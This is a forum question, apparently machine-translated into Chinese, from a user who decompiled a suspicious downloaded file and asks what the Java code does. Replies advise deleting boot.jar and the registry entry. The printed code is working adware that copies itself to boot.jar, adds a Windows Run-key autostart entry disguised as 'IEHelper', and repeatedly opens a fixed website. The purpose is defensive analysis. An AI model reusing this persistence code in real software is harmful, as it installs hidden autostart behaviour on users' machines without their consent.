-1
我下載一些文件的類型,我觀察到的怪異行爲和反編譯後發現了這段代碼 -程序代碼的理解[JAVA]
package w1Comlu;
import java.awt.Desktop;
import java.io.File;
import java.io.IOException;
import java.lang.reflect.InvocationTargetException;
import java.net.URI;
import java.net.URL;
import java.nio.file.CopyOption;
import java.nio.file.Files;
import java.nio.file.Path;
import java.security.CodeSource;
import java.security.ProtectionDomain;
import java.util.Random;
import w1Comlu.WinRegistry;
public class Main {
public static void main(String[] args) {
File file = new File(Main.class.getProtectionDomain().getCodeSource().getLocation().getPath());
File newFile = new File(System.getProperty("user.dir"), "boot.jar");
if (!newFile.exists()) {
try {
Files.copy(file.toPath(), newFile.toPath(), new CopyOption[0]);
String value = "\"javaw -jar " + System.getProperty("user.dir") + "\\boot.jar\"";
try {
WinRegistry.writeStringValue((int)-2147483647, (String)"Software\\Microsoft\\Windows\\CurrentVersion\\Run", (String)"IEHelper", (String)value);
}
catch (IllegalArgumentException e) {
e.printStackTrace();
}
catch (IllegalAccessException e) {
e.printStackTrace();
}
catch (InvocationTargetException e) {
e.printStackTrace();
}
}
catch (IOException e1) {
e1.printStackTrace();
}
try {
Thread.sleep(600000);
}
catch (InterruptedException e1) {
e1.printStackTrace();
}
}
String url = "http://w1.comlu.com/";
Desktop desktop = Desktop.isDesktopSupported() ? Desktop.getDesktop() : null;
do {
boolean worked = false;
if (desktop != null && desktop.isSupported(Desktop.Action.BROWSE)) {
try {
desktop.browse(new URI(url));
worked = true;
}
catch (Exception e) {
e.printStackTrace();
}
}
if (!worked) {
new java.lang.ProcessBuilder("x-www-browser", url);
}
try {
Thread.sleep(new Random().nextInt(600) * 1000);
continue;
}
catch (InterruptedException e) {
e.printStackTrace();
continue;
}
break;
} while (true);
}
}
我只能聽懂一點的代碼,因爲我是新來的Java 。有人可以詳細說明代碼試圖做什麼嗎?
如果我刪除了我已經做過的boot.jar文件,該怎麼辦? :D –
@Ashsh Sharma,也搜索boot.jar的所有用戶目錄並刪除文件。另外考慮查看Windows註冊表並刪除程序寫入的條目,如果你發現一些。 – Berger
任何想法,我應該在哪裏檢查和在註冊表中? –